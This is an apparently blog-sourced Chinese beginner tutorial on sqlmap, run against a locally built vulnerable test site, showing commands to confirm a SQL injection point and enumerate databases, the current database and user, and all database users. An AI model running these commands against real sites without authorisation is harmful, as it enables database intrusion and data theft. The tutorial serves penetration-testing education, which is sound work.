对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。
既然本文是基础教程,以下只写工具的基本使用方法。
本教程为sqlmap具体应用案例,如需了解更多sqlmap资料可以访问官方http://sqlmap.org ,或者乌云知识库http://drops.wooyun.org/tips/401 和 http://drops.wooyun.org/tips/143 。
测试环境:本地搭建的具有sql注入点的网站 http://192.168.1.150
注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。
教程开始:
一、检测注入点是否可用
[plain] view plain copy 在CODE上查看代码片派生到我的代码片
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"
参数:
-u:指定注入点url
结果:
注入结果展示:
(1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。
(2)web服务器系统为windows 2003 or XP
(3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0
(4)数据库类型为:SQLSERVER 2000
其中图一有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:
[plain] view plain copy 在CODE上查看代码片派生到我的代码片
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch
二、暴库
一条命令即可曝出该sqlserver中所有数据库名称,命令如下:
[plain] view plain copy 在CODE上查看代码片派生到我的代码片
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs
参数:
--dbs:dbs前面有两条杠,请看清楚。
结果:
结果显示该sqlserver中共包含7个可用的数据库。
三、web当前使用的数据库
[plain] view plain copy 在CODE上查看代码片派生到我的代码片
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db
四、web数据库使用账户
[plain] view plain copy 在CODE上查看代码片派生到我的代码片
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user
五、列出sqlserver所有用户
[plain] view plain copy 在CODE上查看代码片派生到我的代码片
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users